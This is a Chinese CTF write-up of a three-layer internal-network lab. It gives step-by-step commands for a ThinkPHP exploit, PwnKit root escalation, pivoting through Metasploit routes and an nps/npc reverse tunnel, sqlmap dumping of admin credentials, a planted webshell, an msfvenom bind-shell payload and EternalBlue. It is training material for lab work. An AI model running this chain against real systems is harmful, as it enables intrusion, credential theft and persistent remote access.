CTF赛三层内网渗透

CTF赛三层内网渗透

前言

2019某CTF线下赛真题内网结合WEB攻防题库,涉及WEB攻击,内网代理路由等技术,每台服务器存在Flag,获取一个Flag对应一个积分,获取三个Flag结束。

第一关 Taget1_centos7

1、访问目标网页

在这里插入图片描述

发现是ThinkPHP架构的网页,此时就要引起注意了(v5版本),此时我想到msfconsole里面有个thinkphp模块,可以用来尝试一下

2、搜索可利用的模块

search thinkphp

在这里插入图片描述

3、使用模块

use 0

配置选项show options

在这里插入图片描述

配置完成后run起来

在这里插入图片描述

成功拿到meterpreter

3.1 第一个flage

在这里插入图片描述

3.2 第二个flag

在这里插入图片描述

4、开始提权

方法:系统漏洞直接提权

4.1 搜索和使用模块
post/multi/recon/local_exploit_suggester

在这里插入图片描述

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

在这里插入图片描述

此时就是root权限了

在这里插入图片描述

4.2拿到第三个flage

在这里插入图片描述

在这里插入图片描述

第二关 Taget1_ubuntu 64位

首先要明确一点,第二关我们的kali是不能够直接去访问的,因为第二台靶机处于的是内网环境,所以我们要通过我们拿下的第一台靶机作为跳板去访问渗透第二台靶机

1、尝试通过kali自带的代理模块

1.1 添加路由

在这里插入图片描述

此时我们有第一关靶机的两个不同权限的会话,我们要通过这两个任意的一个会话添加我们访问第二台靶机的路由

进入会话

sessions -i 2 

在这里插入图片描述

下面这个命令是在靶机上创建类似于cmd命令行格式的,带有回显的命令编辑器,方便我们输入命令

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

查看网段信息

在这里插入图片描述

我们就要用内部网段当做跳板

验证猜想

这里再ping一下百度,确认这个靶机有张网卡确实属于外部网卡

ping -c baidu.com

在这里插入图片描述

回到meterpreter查看路由

run autoroute -p

可以看到此时是没有路由表存在的

在这里插入图片描述

所以需要手动去添加

这里添加的是访问22网段的路由,命令如下

run autoroute -s 192.168.22.0/24

成功添加上路由

在这里插入图片描述

1.2 kali添加代理

bg退出meterpreter

搜索代理模块

search socks5_proxy		

在这里插入图片描述

设置本机为代理服务器

set SRVHOST 127.0.0.1

直接run,开启代理

在这里插入图片描述

如果开启之后就直接停止了,就很有可能是1080端口被占用了

可以使用以下命令查看端口的占用情况

netstat -antlp |grep 1080

在这里插入图片描述

此时还不能访问,因为还没有修改代理的配置文件

修改配置文件

vi /etc/proxychains4.conf

在这里插入图片描述

在这文件最下方的ProxyList中修改,如果有其他的直接注释掉

在这里插入图片描述

此时就可以去访问22网段了

2、使用nmap扫描22网段存活主机

因为VM虚拟机自身网卡的问题,这里进行22网段存活主机显示全部存活

nmap -sn -Pn 192.168.22.0/24

在这里插入图片描述

所以我们这里就不进行22网段的目标查找了,因为这里是我们自己搭建的,这里就借用一下上帝视角,直接去访问目标靶机ip

192.168.22.129

3、成功访问第二层

在这里插入图片描述

4、配置火狐浏览器,访问目标网页

在这里插入图片描述

成功访问到

在这里插入图片描述

这里最后还提示了有一个sql注入点

在这里插入图片描述

5、寻找flage和拿shell的点

使用sqlmap进行注入

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1"

开始注入

在这里插入图片描述

这里就发现问题了

在这里插入图片描述

代理超时了,这个原因就是说msf的代理模块本身就不稳定,不支持我们用工具,此时的代理已经是die掉了,所以我们就要尝试更加稳定的代理nps

6、nps代理工具的下载,安装,配置和使用

我们先关闭sql进程

ps -ef|grep sqlmap

关闭代理

在这里插入图片描述

nps下载地址

https://github.com/ehang-io/nps

先查看自己的kali版本,从而选择适合自己的版本

uname -a 

这里我下载到了/opt目录下

在这里插入图片描述

解压之后就是nps文件

安装nps

./nps install

在这里插入图片描述

启动nps

./nos start

在这里插入图片描述

检查服务开启状态

因为nps默认是8080端口

netstat -antlp |grep 8080

在这里插入图片描述

然后去物理机访问

192.168.38.147:8080
||
kali的ip:8080

在这里插入图片描述

登录成功

在这里插入图片描述

7、nps配置隧道

首先新增一个配置

在这里插入图片描述

在这里插入图片描述

查看客户机命令配置

在这里插入图片描述

然后想办法把下载的npc客户机文件上传到第一个靶机,让它成为跳板

8、上传npc客户机文件到第一个靶机

通过我们拿到的sessions

upload 

在这里插入图片描述
在这里插入图片描述

成功上传

在这里插入图片描述

安装客户机

在这里插入图片描述

在这里插入图片描述

输入刚刚复制的命令

./npc -server=192.168.38.147:8024 -vkey=ksqn2nsug8ls8yhd -type=tc

成功

在这里插入图片描述

在这里插入图片描述

点击隧道->新增->选择socks代理

在这里插入图片描述

修改配置文件为刚刚你设置的端口号

在这里插入图片描述

在这里插入图片描述

再次访问

在这里插入图片描述

成功了

到此为止隧道打通了

9、开始获取meterpreter

使用sqlmap开始注入

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch

这次不仅快,并且不会有超时不稳定的问题

在这里插入图片描述

sqlmap成功了

接下来获取后台的登录账户和密码

获取库名

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch --dbs

在这里插入图片描述

很明显,对我们有用的数据库是bagecms

所以我们先去获取这个数据库的所有表名

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch bagecms --tables

在这里插入图片描述

然后我们去获取bage_admin表里面的字段名

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin --columns

在这里插入图片描述

获取字段中的内容

proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin -C username,password --dump 
获取特定的
或者是
proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin --dump
获取整个表的字段

在这里插入图片描述

10、登录后台

此时要重新配置火狐浏览器,设置端口为新的代理端口才可以访问

同时的话这里有两种方案获取后台地址

10.1、通过网上查询bagecms获取后台地址

建议用谷歌语法查询

在这里插入图片描述

10.2、通过目标扫描查询地址(通用方法)

用物理机的direarch挂代理扫描,具体的安装方法这里我就不再赘述了

python dirsearch.py -u http://192.168.22.129 --p
roxy=scoks5://192.168.38.147:1314

11、在后台写入shell

在这里插入图片描述

11.1获取flag
 flag{eS3sd1IKarw}
11.2进入模块管理

写入木马

在这里插入图片描述

然后去访问文件

http://192.168.22.129/index.php?r=tag&666=phpinfo();

在这里插入图片描述

12、连接蚁剑

注意这里的蚁剑需要设置代理才能连接上目标

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

12.1获取flag

在这里插入图片描述

13、制作正向的后门文件,通过蚁剑上传到目标的靶机

msfvenom -p linux/x64/meterpreter/bind_tcp lport=6666 -f elf > /opt/dict/target2.elf

在这里插入图片描述

找到这个文件,通过蚁剑去上传

在这里插入图片描述

13.1 在kali中监听6666端口
use exploit/multi/handler
show options
set LPORT 6666
set LHOST 192.168.22.129
set payload linux/x64/meterpreter/bind_tcp

这里是监听靶机的6666端口,因为是kali发出的正向

在这里插入图片描述

然后run起来之后去蚁剑执行这个文件

在这里插入图片描述

13.2成功拿下第二个靶机

在这里插入图片描述

第三关 window7

用代理启动msf

在这里插入图片描述

再去弄一个正向的shell获得meterpreter

配置路由

查看一下

run autoroute -p

在这里插入图片描述

添加33网段的路由

run autoroute -s 192.168.33.0/24

在这里插入图片描述

搜索模块

search ms17

通过永恒之蓝获取权限即可

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/451451.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

你必须知道的?Python自动化5个EDA库

EDA或探索性数据分析是一项耗时的工作,但是由于EDA是不可避免的,所以Python出现了很多自动化库来减少执行分析所需的时间。EDA的主要目标不是制作花哨的图形或创建彩色的图形,而是获得对数据集的理解,并获得对变量之间的分布和相关…

你今年过年回去吗?

#过年 我是一名21岁刚毕业的大学生,专业是软件技术,主修c#,之前在上海实习了一年,正式工作后来到了深圳,进入了一家电商公司实习。至于我为什么转行了,大家懂的都懂 现在是20240203晚上19.39,还…

springboot与springcloud之间的版本对应关系

https://start.spring.io/actuator/info 当然,你可以直接在: https://spring.io/projects/spring-cloud 上看文档查询, 不过,最后应该是调到这里的: https://github.com/spring-cloud/spring-cloud-release/wiki/Suppo…

你知道,哪类人需要关注自己的大数据信用吗?

在大数据时代,个人信用变得越来越重要,而大数据信用报告则是了解个人信用状况的重要途径之一。然而,不同的人需要关注自己的大数据信用程度也不同。那哪类人需要关注自己的大数据信用呢?本文带你一起去看看。 以下两类人需要特别关注自己的大…

是不是还在为写作发愁呢?为你推荐这几款ai写作神器

写作是许多人常常面临的挑战,但现在有了AI写作神器的出现,我们可以更轻松地应对写作任务。本文将为大家介绍国内6个好用的AI写作软件,详细说明它们的优点和使用特点,帮助你提升写作效率。 一、爱制作AI 爱制作AI是一款功能强大且…

寒假 day1

1、请简述栈区和堆区的区别? 2、有一个整形数组:int arr[](数组的值由外部输入决定),一个整型变量: x(也 由外部输入决定)。要求: 1)删除数组中与x的值相等的元素 2)不得创建新的数组 3)最多只允许使用单层循环 4)无需考虑超出新数组长度后面的元素,所以…

计算机视觉中的目标跟踪

从保护我们城市的监控系统到自动驾驶车辆在道路上行驶,目标跟踪已经成为计算机视觉中的一项基础技术。本文深入探讨了目标跟踪,探索了其基本原理、多样化的方法以及在现实世界中的应用。 什么是目标跟踪? 目标跟踪是深度学习在计算机视觉中广…

大数据环境搭建(一)-Hive

1 hive介绍 由Facebook开源的,用于解决海量结构化日志的数据统计的项目 本质上是将HQL转化为MapReduce、Tez、Spark等程序 Hive表的数据是HDFS上的目录和文件 Hive元数据 metastore,包含Hive表的数据库、表名、列、分区、表类型、表所在目录等。 根据Hive部署模…

VSCode snippets 自定义Vue3代码片段(持续更新)

在编写Vue代码时发现VSCode中的各类snippets插件无法提供一些常用的代码片段,为避免重复造轮子,提高编码效率,特意自己定义了一些代码片段。为方便初学者,提供了自定义代码片断的方法。 一、 自定义代码片断的方法 1.打开命令面板(Ctrl+Shift+P) 2. 输入 user Snippets…

STM32--揭秘中断(简易土货版)

抢占优先级响应优先级 视频学习--中断​​​​​​​

Go协程揭秘:轻量、并发与性能的完美结合

目录 1. Go协程简介什么是Go协程?Go协程与线程的比较Go协程的核心优势 2. Go协程的基本使用创建并启动Go协程使用匿名函数创建Go协程Go协程与主函数 3. Go协程的同步机制1. 通道 (Channels)2. sync.WaitGroup3. 互斥锁 (sync.Mutex) 4. Go协程的高级用法1. 选择器 (…

yo!这里是单例模式相关介绍

目录 前言 特殊类设计 只能在堆上创建对象的类 1.方法一(构造函数下手) 2.方法二(析构函数下手) 只能在栈上创建对象的类 单例模式 饿汉模式实现 懒汉模式实现 后记 前言 在面向找工作学习c的过程中,除了基本…